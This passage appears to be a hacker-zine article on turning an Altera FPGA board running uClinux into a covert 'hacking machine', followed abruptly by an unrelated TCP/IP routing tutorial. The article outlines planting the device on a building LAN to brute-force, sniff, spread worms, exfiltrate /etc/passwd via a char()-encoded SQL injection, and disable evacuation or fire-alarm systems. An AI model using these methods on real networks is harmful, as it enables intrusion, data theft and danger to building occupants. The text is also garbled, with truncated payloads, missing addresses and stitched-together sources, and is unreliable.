together with a Verilog simulator. Both VHDL and Verilog-HDL are reviewed 
and adopted by IEEE as IEEE standard 1076 and 1364, respectively.

    Modern hardware implementation of embedded systems can be classified 
into two categories: hardcore processing and softcore processing. Hardcore
processing is a method of applying hard processor(s) such as ARM, MIPS,
x86, and etc as processing unit with integrated protocol stack. 
For example, SC12 with x86, IP2022 with Scenix RISC, eZ80, SitePlayer 
and Rabbit are dropped in the category of hardcore processing.Instead,
softcore processing is applying a synthesizable core that can be targeted
into different semiconductor fabrics. The semiconductor fabrics should be
programmable as what FPGA and CPLD do. Altera[3] and Xilinx[4] are the
only FPGA/CPLD manufacturers in the market that supporting softcore 
processor. Altera provides NIOS processor that can be implemented in SOPC 
Builder that is targeted to its Cyclone and Stratix FPGAs. Xilinx provides 
two types of softcore: Picoblaze, that is targeted to its CoolRunner-2 
CPLD; and Microblaze, that is targeted to its Spartan and Virtex FPGAs.  
For the case of FPGAs with embedded hardcore, for example ARM-core in 
Stratix, and MIPS-core in Virtex are classified as embedded hardcore 
processing. On the other hand, FPGAs with embedded softcore such as 
NIOS-core in Cyclone or Stratix, and Microblaze-core in Spartan or Virtex 
are classified as softcore processing. Besides, the embedded softcore can 
be associated with others synthesizable peripherals such as DMA controller 
for advanced processing purpose. 

    In general, the classical point of view regarding to the hardcore 
processing might assuming it is always running faster than softcore 
processing. However, it is not the fact. Processor performance is often 
limited by how fast the instruction and data can be pipelined from external
memory into execution unit. As a result, hardcore processing is more 
suitable for general application purpose but softcore processing is more 
liable to be used in customized application purpose with parallel 
processing and DSP. It is targeted to flexible implementation in adaptive 

--[ 3. - Hacking with Embedded System

    When the advantages of softcore processing are applied in hacking, it 
brings out more creative methods of attack, the only limitation is the 
imagination. Richard Clayton had shown the method of extracting a 3DES key 
from an IBM 4758 that is running Common Cryptographic Architecture 
(CCA)[5]. The IBM 4758 with its CCA software is widely used in the banking 
industry to hold encryption keys securely. The device is extremely 
tamper-resistant and no physical attack is known that will allow keys to be 
accessed. According to Richard, about 20 minutes of uninterrupted access to 
the IBM 4758 with Combine_Key_Parts permission is sufficient to export the 
DES and 3DES keys. For convenience purpose, it is more likely to implement 
an embedded system with customized application to get the keys within the 
20 minutes of accessing to the device. An evaluation board from Altera was 
selected by Richard Clayton for the purpose of keys exporting and 
additional two days of offline key cracking.

    In practice, by using multiple NIOS-core with customized peripherals 
would provide better performance in offline key cracking. In fact, 
customized parallel processing is very suitable to exploit both symmetrical 
and asymmetrical encrypted keys.   

--[ 4. - Hacking with Embedded Linux

    For application based hacking, such as buffer overflow and SQL 
injection, it is more preferred to have RTOS installed in the embedded 
system. For code reusability purpose, embedded linux would be the best 
choice of embedded hacking platform. The following examples have clearly 
shown the possible attacks under an embedded platform. The condition of 
the embedded platform is come with a Nios-core in Stratix and  uClinux 
being installed. By recompiling the source code of netcat and make it run 
in uClinux, a swiss army knife is created and ready to perform penetration 
as listed below: -

    a) Port Scan With Pattern Recognition 

        A list of subnet can be defined initially in the embedded system 
    and bring it into a commercial building. Plug the embedded system 
    into any RJ45 socket in the building, press a button to perform port 
    scan with pattern recognition and identify any vulnerable network 
    embedded system in the building. Press another button to launch attack 
    (Denial of Service) to the target network embedded system(s). This 
    is a serious problem when the target network embedded system(s) is/are 
    related to the building evacuation system, surveillance system or 
    security system.

     b) Automatic Brute-Force Attack

        Defines server(s) address, dictionary, and brute-force pattern 
    in the embedded system. Again, plug the embedded system into any RJ45
    socket in the building, press a button to start the password guessing 
    process. While this small box of embedded system is located in a hidden
    corner of any RJ45 socket, it can perform the task of cracking over 
    days, powered by battery.

    c) LAN Hacking

        By pre-identify the server(s) address, version of patch, type 
    of service(s), a structured attack can be launched within the area 
    of the building. For example, by defining:

        **char(47,101,116,99,47,112,97,115,115,119,100) = /etc/passwd

    in the embedded system initially. Again, plug the embedded system into
    any RJ45 socket in the building (within the LAN), press a button to
    start SQL injection attack to grab the password file of the Unix
    machine (in the LAN). The password file is then store in the flash 
    memory and ready to be loaded out for offline cracking. Instead of 
    performing SQL injection, exploits can be used for the same 

    d) Virus/Worm Spreading

        The virus/worm can be pre-loaded in the embedded system. Again, 
    plug the embedded system into any RJ45 socket in the building, press a 
    button to run an exploit to any vulnerable target machine, and load the
    virus/worm into the LAN.

    e) Embedded Sniffer

        Switch the network interface from normal mode into promiscuous mode 
    and define the sniffing conditions. Again, plug the embedded system 
    into any RJ45 socket in the building, press a button to start the 
    sniffer. To make sure the sniffing process can be proceed in switch 
    LAN, ARP sniffer is recommended for this purpose. 

--[ 5. - "Hacking Machine" Implementation In FPGA

    The implementation of embedded "hacking machine" will be demonstrated 
in Altera's NIOS development board with Stratix EP1S10 FPGA. The board 
provides a 10/100-base-T ethernet and a compact-flash connector. Two
RS-232 ports are also provided for serial interfacing and system 
configuration purposes, respectively. Besides, the onboard 1MB of SRAM, 
16MB of SDRAM, and 8MB of flash memory are ready for embedded linux 
installation[6]. The version of embedded linux that is going to be applied 
is uClinux from microtronix[7]. 

    Ok, that is the specification of the board. Now, we start our journey 
of "hacking machine" design. We use three tools provided by Altera to 
implement our "hardware" design. In this case, the term of "hardware" means
it is synthesizable and to be designed in Verilog-HDL. The three tools 
being used are: QuartusII ( as synthesis tool), SOPC Builder (as 
Nios-core design tool), and C compiler. Others synthesis tools such as 
leonardo-spectrum from mentor graphic, and synplify from synplicity are 
optional to be used for special purpose. In this case, the synthesized 
design in edif format is defined as external module. It is needed to import
the module from QuartusII to perform place-and-route (PAR). The outcome of 
PAR is defined as hardware-core. For advanced user, Modelsim from mentor 
graphic is highly recommended to perform behavioral simulation and Post-PAR
simulation. Behavioral simulation is a type of functional verification to 
the digital hardware design. Timing issues are not put into the 
consideration in this state. Instead, Post-PAR simulation is a type of 
real-case verification. In this state, all the real-case factors such as 
power-consumption and timing conditions (in sdf format) are put into the 
consideration. [8,9,10,11,12]

    A reference design is provided by microtronix and it is highly 
recommended to be the design framework for any others custom design with
appropriate modifications [13]. Well, for our "hacking machine" design
purpose, the only modification that we need to do is to assign the 
interrupts of four onboard push-buttons [14]. So, once the design 
framework is loaded into QuartusII, SOPC Builder is ready to start 
the design of Nios-core, Boot-ROM, SRAM and SDRAM inteface, Ethernet 
interface, compact-flash interface and so on. Before starting to generate 
synthesizable codes from the design, it is crucial to ensure the check-box 
of "Microtronix uClinux" under Software Components is selected (it is in 
the "More CPU Settings" tab of the main configuration windows in SOPC 
Builder). By selecting this option, it is enabling to build a uClinux 
kernel, uClibc library, and some uClinux's general purpose applications by 
the time of generating synthesizable codes. Once ready, generate the design 
as synthesizable codes in SOPC Builder following by performing PAR in 
QuartusII to get a hardware core. In general, there are two formats of 
hardware core:- 

    a) .sof core:  To be downloaded into the EP1S10 directly by JTAG and 
                   will require a re-load if the board is power cycled
                   **(Think as volatile)

    b) .pof core:  To be downloaded into EPC16 (enhanced configuration
                   device) and will automatically be loaded into the 
                   FPGA every time the board is power cycled
                   **(Think as non-volatile)

    The raw format of .sof and .pof hardware core is .hexout. As hacker, 
we would prefer to work in command line, so we use the hexout2flash tool 
to convert the hardware core from .hexout into .flash and relocate the 
base address of the core to 0x600000 in flash. The 0x600000 is the startup 
core loading address of EP1S10. So, once the .flash file is created, we 
use nios-run or nr command to download the hardware core into flash memory 
as following:

    [Linux Developer] ...uClinux/: nios-run hackcore.hexout.flash

    After nios-run indicates that the download has completed successfully, 
restart the board. The downloaded core will now start as the default core 
whenever the board is restarted.

    Fine, the "hardware" part is completed. Now, we look into the 
"software" implementation. We start from uClinux. As what is stated, the 
SOPC Builder had generated a framework of uClinux kernel, uClibc library, 
and some uClinux general purpose applications such as cat, mv, rm, and etc.

We start to reconfigure the kernel by using "make xconfig". 

    [Linux Developer] ...uClinux/: cd linux
    [Linux Developer] ...uClinux/: make xconfig

In xconfig, perform appropriate tuning to the kernel, then use 
"make clean" to clean the source tree of any object files.

    [Linux Developer] ...linux/: make clean 

To start building a new kernel use "make dep" following by "make". 

    [Linux Developer] ...linux/: make dep
    [Linux Developer] ...linux/: make

To build the linux.flash file for uploading, use "make linux.flash". 

    [Linux Developer] ...uClinux/: make linux.flash

The linux.flash file is defined as the operating system image. 
As what we know, an operating system must run with a file system.
So, we need to create a file system image too. First, edit the config
file in userland/.config to select which application packages get 
built. For example:

    #TITLE agetty

If an application package's corresponding variable is set to 'n' 
(for example, CONFIG_AGETTY=n), then it will not be built and copied
over to the target/ directory. Then, build all application packages 
specified in the userland/.config as following:

    [Linux Developer] ...userland/: make

Now, we copy the pre-compiled netcat into target/ directory. 
After that, use "make romfs" to start generating the file system or 
romdisk image. 

    [Linux Developer] ...uClinux/: make romfs

Once completed, the resulting romdisk.flash file is ready to be 
to the target board. First, download the file system image following by
the operating system image into the flash memory.  

    [Linux Developer] ...uClinux/: nios-run -x romdisk.flash
    [Linux Developer] ...uClinux/: nios-run linux.flash

Well, our FPGA-based "hacking machine" is ready now. 

    Lets try to make use of it to a linux machine with /etc/passwd 
enabled. We assume the ip of the target linux machine is 
as web server in the LAN that utilize MySQL database. Besides, we know 
that its show.php is vulnerable to be SQL injected. We also assume it has 
some security protections to filter out some dangerous symbols, so we 
decided to use char() method of injection. We assume the total columns in 
the table that access by show.php is 8.

Now, we define:

    char getpass[]="

as attacking string, and we store the respond data (content of 
/etc/passwd) in a file name of password.dat. By creating a pipe to the 
netcat, and at the same time to make sure the attacking string is always 
triggered by the push-button, well, our "hacking machine" is ready.

    Plug the "hacking machine" into any of the RJ45 socket in the LAN, 
following by pressing a button to trigger the attacking string against After that, unplug the "hacking machine" and connect to a 
pc, download the password.dat from the "hacking machine", and start the 
cracking process. By utilizing the advantages of FPGA architecture,
a hardware cracker can be appended for embedded based cracking process.
Any optional module can be designed in Verilog-HDL and attach to the 
FPGA for all-in-one hacking purpose. The advantages of FPGA implementation
over the conventional hardcore processors will be deepened in the 
following section, with a lot of case-studies, comparisons and 
wonderful examples.


**FTP server is recommended to be installed in "hacking machine" 
because of two reasons:

  1) Any new or value-added updates (trojans, exploits, worms,...) to 
     the "hacking machine" can be done through FTP (online update).

  2) The grabbed information (password files, configuration files,...) 
     can be retrieved easily.


**Installation of FTP server in uClinux is done by editing 
  userland/.config file to enable the ftpd service.     

**This is just a demostration, it is nearly impossible to get a 
  unix/linux machine that do not utilize file-permission and shadow 
  to protect the password file. This article is purposely to show 
  the migration of hacking methodology from PC-based into embedded 
  system based.

--[ 6. - What The Advantages Of Using FPGA In Hacking ?

    Well, this is a good question while someone will ask by using a $50 
Rabbit module, a 9V battery and 20 lines of Dynamic C, a simple "hacking 
machine" can be implemented, instead of using a $300 FPGA development 
board and a proprietary embedded processor with another $495. The answer 
is, FPGA provides a very unique feature based on its architecture that is 
able to be hardware re-programmable. 

    As what we know, FPGA is a well known platform for algorithm 
verification in hardware implementation, especially in DSP applications. 
The demand for higher bit rates by the wired and wireless communications 
industry has led to the development of higher bit rate and low cost serial 
link interface chips. Based on such considerations, some demands of 
programmable channel and band scanning are needed to be digitized and 
re-programmable. A new term has been created for this type of framework 
as "software defined radio" or SDR. However, the slow adoption of SDR is 
due to the limitation in Analog-to-Digital Converter(ADC) to digitize 
the analog demodulation unit in transceiver module. 
Although the sampling rate of the most advanced ADC is not yet to meet 
the specification of SDR, but it will come true soon. In this case, the 
application of conventional DSP chips such as TMS320C6200 (for 
fixed-point processing) and TMS320C6700 (for floating-point processing) 
are a little bit harder to handle such extremely high bit rates. Of 
course, someone may claim its parallel processing technique could solve 
the problem by using the following symbols in linear assembly language[15].

    ||	Inst2
    ||	Inst3
    ||	Inst4    
    ||	Inst5
    ||	Inst6

    The double-pipe symbols (||) indicate instructions that are in parallel
with a previous instruction. Inst2 to Inst6, these five instructions run 
in parallel with the first instruction, Inst1. In TMS320, up to eight 
instructions can be running in parallel. However, this is not a true 
parallel method, but perform pipelining in different time-slot within a 
single clock cycle.
Instead, the true parallel processing can only be implemented with 
different sets of hardware module. So, FPGA should be the only solution to 
implement a true parallel processing architecture. For the case of SDR that 
is mentioned, it is just a an example to show the limitation of data 
processing in the structure of resource sharing. Meanwhile, when we 
consider to implement an encryption module, it is the same case as what 
data processing do. The method of parallel processing is extremely worth to 
enhance the time of key cracking process. Besides, it is significant to 
know that the implementation of encryption module in FPGA is 
hardware-driven. It is totally free from the limitation of any hardcore 
processor structure that is using a single instruction pointer (or program 
counter) to performing push and pop operations interactively over the stack 
memory. So, both of the mentioned advantages: true-parallel processing, and 
hardware-driven, are nicely clarified the uniqueness of FPGA's architecture 
for advanced applications. 

    While we go further with the uniqueness of FPGA's architecture, 
more and more interesting issues can come into the discussion. 
For hacking purpose, we focus and stick to the discussion of utilizing 
the ability of hardware re-programmable in a FPGA-based "hacking machine". 
We ignore the ability of "software re-programmable" here because it can be 
done by any of the hardcore processor in the lowest cost. By applying the 
characterictic of hardware re-programmable, a segment of space in flash 
memory is reserved for hardware image. In Nios, it is started from 
0x600000. This segment is available to be updated from remote through the 
network interface. In advanced mobile communication, this type of feature 
is started to be used for hardware bug-fix as well as module update [16] 
purpose. It is usually known as Over-The-Air (OTA) technology. For hacking 
purpose, the characteristic of hardware re-programmable had made our 
"hacking machine" to be general purpose. It can come with a hardware-driven 
DES cracker, and easily be changed to MD5 cracker or any other types of 
hardware-driven module. Besides, it can also be changed from an online 
cracker to be a proxy, in a second of time. 

    In this state, the uniqueness of FPGA's architecture is clear now. 
So, it is the time to start the discussion of black magic with the 
characteristic of hardware re-programmable in further detail. By using 
Nios-core, we explore from two points: custom instruction and user 
peripheral. A custom instruction is hardware-driven and implemented by 
custom logic as shown below:

       |     |Custom Logic|-|
       | |-->|------------| |
       | |                  | 
       | | |----------------||
    A ---->|               |-|
       |   |  Nios-ALU     | |----> OUT
    B ---->|               |-|

By defining a custom logic that is parallel connected with Nios-ALU inputs, 
a new custom instruction is successfully created. With SOPC Builder, custom 
logic can be easily add-on and take-out from Nios-ALU, and so is the case 
of custom instruction. Now, we create a new custom instruction, let say 
nm_fpmult(). We apply the following codes:

    float a, b, result_slow, result_fast;

    result_slow = a * b;            //Takes 2874 clock cycles
    result_fast = nm_fpmult(a, b);  //Takes 19 clock cycles

From the running result, the operation of hardware-based multiplication 
as custom instruction is so fast that is even faster than a DSP chip. 
For cracking purpose, custom instructions set can be build up in respective 
to the frequency of operations being used. The instructions set is easily 
to be plugged and unplugged for different types of encryption being 

    The user peripheral is the second black magic of hardware 
re-programmable. As we know Nios-core is a soft processor, so a bus 
specification is needed for the communication of soft processor with other 
peripherals, such as RAM, ROM, UART, and timer. Nios-core is using a 
proprietary bus specification, known as Avalon-bus for 
peripheral-to-peripheral and Nios-core-to-peripheral communication purpose.
So, user peripherals such as IDE and USB modules are usually be designed to 
expand the usability of embedded system. For hacking purpose, we ignore the 
IDE and USB peripherals because we are more interested to design user 
peripheral for custom communication channel synchronization. When we 
consider to hack a customize system such as building automation, public 
addressing, evacuation, security, and so on, the main obstacle is its 
proprietary communication protocol [17, 18, 19, 20, 21, 22]. 

    In such case, a typical network interface is almost impossible to 
synchronize into the communication channel of a customize system. 
For example, a system that is running at 50Mbps, neither a 10Based-T
nor 100Based-T network interface card can communicate with any module
within the system. However, by knowing the technical specification of such 
system, a custom communication peripheral can be created in FPGA. So, it is 
able to synchronize our "hacking machine" into the communication channel of 
the customize system. By going through the Avalon-bus, Nios-core is 
available to manipulate the data-flow of the customize system. So, the 
custom communication peripheral is going to be the customize media gateway 
of our "hacking machine". The theoretical basis of custom communication 
peripheral is come from the mechanism of clock data recovery (CDR). CDR is 
a method to ensure the data regeneration is done with a decision circuit 
that samples the data signal at the optimal instant indicated by a clock. 
The clock must be synchronized as exactly the same frequency as the data 
rate, and be aligned in phase with respect to the data. The production of 
such a clock at the receiver is the goal of CDR. In general, the task of 
CDR is divided into two: frequency acquisition and timing alignment. 
    Frequency acquisition is the process that locks the receiver clock 
frequency to the transmitted data frequency. Timing alignment is the phase 
alignment of the clock so the decision circuit samples the data at the 
optimal instant. Sometime, it is also named as bit synchronization or phase 
locking. Most timing alignment circuits can perform a limited degree of 
frequency acquisition, but additional acquisition aids may be needed. Data 
oversampling method is being used to create the CDR for our "hacking 
machine". By using the method of data oversampling, frequency acquisition 
is no longer be put into the design consideration. By ensuring the sampling 
frequency is always N times over than data rate, the CDR is able to work as 
normal. To synchronize multiple of customize systems, a frequency synthesis 
unit such as PLL is recommended to be used to make sure the sampling 
frequency is always N times over than data rate. A framework of CDR 
based-on the data oversampling method with N=4 is shown as following in 

**The sampling frequency is 48MHz (mclk), which is 4 times of 
  data rate (12MHz).

    //define input and output 

    input data_in;
    input mclk;
    input rst;

    output data_buf;

    //asynchronous edge detector

    wire reset = (rst & ~(data_in ^ capture_buf));

    //data oversampling module

    reg capture_buf;

    always @ (posedge mclk or negedge rst)
      if (rst == 0) 
        capture_buf <= 0;
        capture_buf <= data_in;

    //edge detection module

    reg [1:0] mclk_divd;

    always @ (posedge mclk or negedge reset or posedge reset)
      if (reset == 0) 
        mclk_divd <= 2'b00;	
        mclk_divd <= mclk_divd + 1;

    //capture at data eye and put into a 16-bit buffer

    reg [15:0] data_buf;

    always @ (posedge mclk_divd[1] or negedge rst)
      if (rst == 0) 
        data_buf <= 0;
        data_buf <= {data_buf[14:0],capture_buf};

    Once the channel is synchronized, the data can be transferred to 
Nios-core through the Avalon-Bus for further processing and interaction. 
The framework of CDR is plenty worth for channel synchronization in various 
types of custom communication channels. Jean P. Nicolle had shown another 
type of CDR for 10Base-T bit synchronization [23]. As someone might query 
for the most common approach of performing CDR channel synchronization in 
Phase-Locked Loop (PLL). Yes, this is a type of well known analog approach, 
by we are more interested to the digital approach, with the reason of 
hardware re-programmable - our black magic of FPGA. For those who 
interested to know more advantages of digital CDR approach over the analog 
CDR approach can refer to [24]. Anyway, the analog CDR approach is the only 
option for a hardcore-based (Scenix, Rabbit, SC12 ,...) "hacking machine" 
design, and it is sufferred to: 

1. Longer design time for different data rate of the communication link.
   The PLL lock-time to preamble length, charge-pump circuit design, 
   Voltage Controlled Oscillator (VCO), are very critical points.

2. Fixed-structure design. Any changes of "hacking application" need
   to re-design the circuit itself, and it is quite cumbersome.

    As a result, by getting a detail technical specification of a 
customized system, the possibility to hack into the system has always 
existed, especially to launch the Denial of Service attack. By disabling 
an evacuation system, or a fire alarm system at emergency, it is a very 
serious problem than ever. Try to imagine, when different types of CDRs 
are implemented in a single FPGA, and it is able to perform automatic 
switching to select a right CDR for channel synchronization. On the other 
hand, any custom defined module is able to plug into the system itself 
and freely communicate through Avalon-bus. Besides, the generated hardware 
image is able to be downloaded into flash memory through tftp. By following 
with a soft-reset to re-configure the FPGA, the "hacking machine" is 
successfully updated. So, it is ready to hack multiple of custom systems at 
the same time.   

case study:

**The development of OPC technology is slowly become popular.
  According to The OPC Foundation, OPC technology can eliminate
  expensive custom interfaces and drivers tranditionally required
  for moving information easily around the enterprise. It promotes 
  interoperability, including amongst different computing solutions
  and platforms both horizontally and vertically in the emterprise [25].

--[ 7. - What Else Of Magic That Embedded Linux Can Do ?

    So, we know the weakness of embedded system now, and we also know 
how to utilize the advantages of embedded system for hacking purpose. 
Then, what else of magic that we can do with embedded system? This is a 
good question.

    By referring to the development of network applications, ubiquitous 
and pervasive computing would be the latest issues. Embedded system would
probably to be the future framework as embedded firewall, ubiquitous 
gateway/router, embedded IDS, mobile device security server, and so on.
While existing systems are looking for network-enabled, embedded system
had established its unique position for such purpose. A good example is
migrating MySQL into embedded linux to provide online database-on-chip
service (in FPGA) for a building access system with RFID tags. Again, 
the usage and development of embedded system has no limitation, the only 
limitation is the imagination.


**If an embedded system works as a server (http, ftp, ...), it is going
  to provide services such as web control, web monitoring,...
**If an embedded system works as a client (http, ftp, telnet, ..), then
  it is more likely to be a programmable "hacking machine"    

--[ 8. - Conclusion

    Embedded system is an extremely useful technology, because we can't
expect every processing unit in the world as a personal computer. While
we are begining to exploit the usefullness of embedded system, we need
to consider all the cases properly, where we should use it and where we
shouldn't use it. Embedded security might be too new to discuss seriously
now but it always exist, and sometime naive. Besides, the abuse of embedded
system would cause more mysterious cases in the hacking world.

--=[ References






A TCP/IP Tutorial : Behind The Internet(part 2 of 2)

5.  Internet Protocol

   The IP module is central to internet technology and the essence of IP
   is its route table.  IP uses this in-memory table to make all
   decisions about routing an IP packet.  The content of the route table
   is defined by the network administrator.  Mistakes block

   To understand how a route table is used is to understand
   internetworking.  This understanding is necessary for the successful
   administration and maintenance of an IP network.

   The route table is best understood by first having an overview of
   routing, then learing about IP network addresses, and then looking
   at the details.

5.1  Direct Routing

   The figure below is of a tiny internet with 3 computers: A, B, and C.
   Each computer has the same TCP/IP protocol stack as in Figure 1.
   Each computer's Ethernet interface has its own Ethernet address.
   Each computer has an IP address assigned to the IP interface by the
   network manager, who also has assigned an IP network number to the

                          A      B      C
                          |      |      |
                        Ethernet 1
                        IP network "development"

                       Figure 6.  One IP Network

   When A sends an IP packet to B, the IP header contains A's IP address
   as the source IP address, and the Ethernet header contains A's
   Ethernet address as the source Ethernet address.  Also, the IP header
   contains B's IP address as the destination IP address and the
   Ethernet header contains B's Ethernet address as the des
                |address            source  destination|
                |IP header          A       B          |
                |Ethernet header    A       B          |
       TABLE 5.  Addresses in an Ethernet frame for an IP packet
                              from A to B

   For this simple case, IP is overhead because the IP adds little to
   the service offered by Ethernet.  However, IP does add cost: the
   extra CPU processing and network bandwidth to generate, transmit, and
   parse the IP header.

   When B's IP module receives the IP packet from A, it checks the
   destination IP address against its own, looking for a match, then it
   passes the datagram to the upper-level protocol.

   This communication between A and B uses direct routing.

5.2  Indirect Routing

   The figure below is a more realistic view of an internet.  It is
   composed of 3 Ethernets and 3 IP networks connected by an IP-router
   called computer D.  Each IP network has 4 computers; each computer
   has its own IP address and Ethernet address.

          A      B      C      ----D----      E      F      G
          |      |      |      |   |   |      |      |      |
        --o------o------o------o-  |  -o------o------o------o--
        Ethernet 1                 |  Ethernet 2
        IP network "development"   |  IP network "accounting"
                                   |     H      I      J
                                   |     |      |      |
                                  Ethernet 3
                                  IP network "factory"

               Figure 7.  Three IP Networks; One internet

   Except for computer D, each computer has a TCP/IP protocol stack like
   that in Figure 1.  Computer D is the IP-router; it is connected to
   all 3 networks and therefore has 3 IP addresses and 3 Ethernet
   addresses.  Computer D has a TCP/IP protocol stack similar to that in
   Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers
   instead of 2.  Please note that computer D has only one IP module.

   The network manager has assigned a unique number, called an IP
   network number, to each of the Ethernets.  The IP network numbers are
   not shown in this diagram, just the network names.

   When computer A sends an IP packet to computer B, the process is
   identical to the single network example above.  Any communication
   between computers located on a single IP network matches the direct
   routing example discussed previously.

   When computer D and A communicate, it is direct communication.  When
   computer D and E communicate, it is direct communication.  When
   computer D and H communicate, it is direct communication.  This is
   because each of these pairs of computers is on the same IP network.

   However, when computer A communicates with a computer on the far side
   of the IP-router, communication is no longer direct.  A must use D to
   forward the IP packet to the next IP network.  This communication is
   called "indirect".

   This routing of IP packets is done by IP modules and happens
   transparently to TCP, UDP, and the network applications.

   If A sends an IP packet to E, the source IP address and the source
   Ethernet address are A's.  The destination IP address is E's, but
   because A's IP module sends the IP packet to D for forwarding, the
   destination Ethernet address is D's.

                |address            source  destination|
                |IP header          A       E          |
                |Ethernet header    A       D          |
       TABLE 6.  Addresses in an Ethernet frame for an IP packet
                         from A to E (before D)

   D's IP module receives the IP packet and upon examining the
   destination IP address, says "This is not my IP address," and sends
   the IP packet directly to E.

                |address            source  destination|
                |IP header          A       E          |
                |Ethernet header    D       E          |
       TABLE 7.  Addresses in an Ethernet frame for an IP packet
                         from A to E (after D)

   In summary, for direct communication, both the source IP address and
   the source Ethernet address is the sender's, and the destination IP
   address and the destination Ethernet addrss is the recipient's.  For
   indirect communication, the IP address and Ethernet addresses do not
   pair up in this way.

   This example internet is a very simple one.  Real networks are often
   complicated by many factors, resulting in multiple IP-routers and
   several types of physical networks.  This example internet might have
   come about because the network manager wanted to split a large
   Ethernet in order to localize Ethernet broadcast traffic.

5.3  IP Module Routing Rules

   This overview of routing has shown what happens, but not how it
   happens.  Now let's examine the rules, or algorithm, used by the IP

     For an outgoing IP packet, entering IP from an upper layer, IP must
     decide whether to send the IP packet directly or indirectly, and IP
     must choose a lower network interface.  These choices are made by
     consulting the route table.

     For an incoming IP packet, entering IP from a lower interface, IP
     must decide whether to forward the IP packet or pass it to an upper
     layer.  If the IP packet is being forwarded, it is treated as an
     outgoing IP packet.

     When an incoming IP packet arrives it is never forwarded back out
     through the same network interface.

   These decisions are made before the IP packet is handed to the lower
   interface and before the ARP table is consulted.

5.4  IP Address

   The network manager assigns IP addresses to computers according to
   the IP network to which the computer is attached.  One part of a 4-
   byte IP address is the IP network number, the other part is the IP
   computer number (or host number).  For the computer in table 1, with
   an IP address of, the network number is 223.1.2 and the
   host number is number 1.

   The portion of the address that is used for network number and for
   host number is defined by the upper bits in the 4-byte address.  All
   example IP addresses in this tutorial are of type class C, meaning
   that the upper 3 bits indicate that 21 bits are the network number
   and 8 bits are the host number.  This allows 2,097,152 class C
   networks up to 254 hosts on each network.

   The IP address space is administered by the NIC (Network Information
   Center).  All internets that are connected to the single world-wide
   Internet must use network numbers assigned by the NIC.  If you are
   setting up your own internet and you are not intending to connect it
   to the Internet, you should still obtain your network numbers from
   the NIC.  If you pick your own number, you run the risk of confusion
   and chaos in the eventuality that your internet is connected to
   another internet.

5.5  Names

   People refer to computers by names, not numbers.  A computer called
   alpha might have the IP address of  For small networks,
   this name-to-address translation data is often kept on each computer
   in the "hosts" file.  For larger networks, this translation data file
   is stored on a server and accessed across the network when needed.  A
   few lines from that file might look like this:     alpha     beta     gamma     delta     epsilon     iota

   The IP address is the first column and the computer name is the
   second column.

   In most cases, you can install identical "hosts" files on all
   computers.  You may notice that "delta" has only one entry in this
   file even though it has 3 IP addresses.  Delta can be reached with
   any of its IP addresses; it does not matter which one is used.  When
   delta receives an IP packet and looks at the destination address, it
   will recognize any of its own IP addresses.

   IP networks are also given names.  If you have 3 IP networks, your
   "networks" file for documenting these names might look something like

   223.1.2     development
   223.1.3     accounting
   223.1.4     factory

   The IP network number is in the first column and its name is in the
   second column.

   From this example you can see that alpha is computer number 1 on the
   development network, beta is computer number 2 on the development
   network and so on.  You might also say that alpha is development.1,
   Beta is development.2, and so on.

   The above hosts file is adequate for the users, but the network
   manager will probably replace the line for delta with:     devnetrouter    delta     facnetrouter     accnetrouter

   These three new lines for the hosts file give each of delta's IP
   addresses a meaningful name.  In fact, the first IP address listed
   has 2 names; "delta" and "devnetrouter" are synonyms.  In practice
   "delta" is the general-purpose name of the computer and the other 3
   names are only used when administering the IP route table.

   These files are used by network administration commands and network
   applications to provide meaningful names.  They are not required for
   operation of an internet, but they do make it easier for us.

5.6  IP Route Table

   How does IP know which lower network interface to use when sending
   out a IP packet?  IP looks it up in the route table using a search
   key of the IP network number extracted from the IP destination

   The route table contains one row for each route.  The primary columns
   in the route table are:  IP network number, direct/indirect flag,
   router IP address, and interface number.  This table is referred to
   by IP for each outgoing IP packet.

   On most computers the route table can be modified with the "route"
   command.  The content of the route table is defined by the network
   manager, because the network manager assigns the IP addresses to the

5.7  Direct Routing Details

   To explain how it is used, let us visit in detail the routing
   situations we have reviewed previously.

                        ---------        ---------
                        | alpha |         | beta  |
                        |    1  |         |  1    |
                        ---------         ---------
                             |               |
                      Ethernet 1
                      IP network "development"

               Figure 8.  Close-up View of One IP Network

   The route table inside alpha looks like this:

     |network      direct/indirect flag  router   interface number|
     |development  direct                <blank>  1               |
                  TABLE 8.  Example Simple Route Table

   This view can be seen on some UNIX systems with the "netstat -r"
   command.  With this simple network, all computers have identical
   routing tables.

   For discussion, the table is printed again without the network number
   translated to its network name.

     |network      direct/indirect flag  router   interface number|
     |223.1.2      direct                <blank>  1               |
           TABLE 9.  Example Simple Route Table with Numbers

5.8  Direct Scenario

   Alpha is sending an IP packet to beta.  The IP packet is in alpha's
   IP module and the destination IP address is beta or  IP
   extracts the network portion of this IP address and scans the first
   column of the table looking for a match.  With this network a match
   is found on the first entry.

   The other information in this entry indicates that computers on this
   network can be reached directly through interface number 1.  An ARP
   table translation is done on beta's IP address then the Ethernet
   frame is sent directly to beta via interface number 1.

   If an application tries to send data to an IP address that is not on
   the development network, IP will be unable to find a match in the
   route table.  IP then discards the IP packet.  Some computers provide
   a "Network not reachable" error message.

5.9  Indirect Routing Details

   Now, let's take a closer look at the more complicated routing
   scenario that we examined previously.

          ---------           ---------           ---------
          | alpha |           | delta |           |epsilon|
          |    1  |           |1  2  3|           |   1   |
          ---------           ---------           ---------
               |               |  |  |                |
       --------o---------------o- | -o----------------o--------
        Ethernet 1                |     Ethernet 2
        IP network "Development"  |     IP network "accounting"
                                  |     --------
                                  |     | iota |
                                  |     |  1   |
                                  |     --------
                                  |        |
                                    Ethernet 3
                                    IP network "factory"

             Figure 9.  Close-up View of Three IP Networks

   The route table inside alpha looks like this:

 |network      direct/indirect flag  router          interface number|
 |development  direct                <blank>         1               |
 |accounting   indirect              devnetrouter    1               |
 |factory      indirect              devnetrouter    1               |
                      TABLE 10.  Alpha Route Table

   For discussion the table is printed again using numbers instead of

  |network      direct/indirect flag  router         interface number|
  |223.1.2      direct                <blank>        1               |
  |223.1.3      indirect          1               |
  |223.1.4      indirect          1               |
               TABLE 11.  Alpha Route Table with Numbers

   The router in Alpha's route table is the IP address of delta's
   connection to the development network.

5.10  Indirect Scenario

   Alpha is sending an IP packet to epsilon.  The IP packet is in
   alpha's IP module and the destination IP address is epsilon
   (  IP extracts th network portion of this IP address
   (223.1.3) and scans the first column of the table looking for a
   match.  A match is found on the second entry.

   This entry indicates that computers on the 223.1.3 network can be
   reached through the IP-router devnetrouter.  Alpha's IP module then
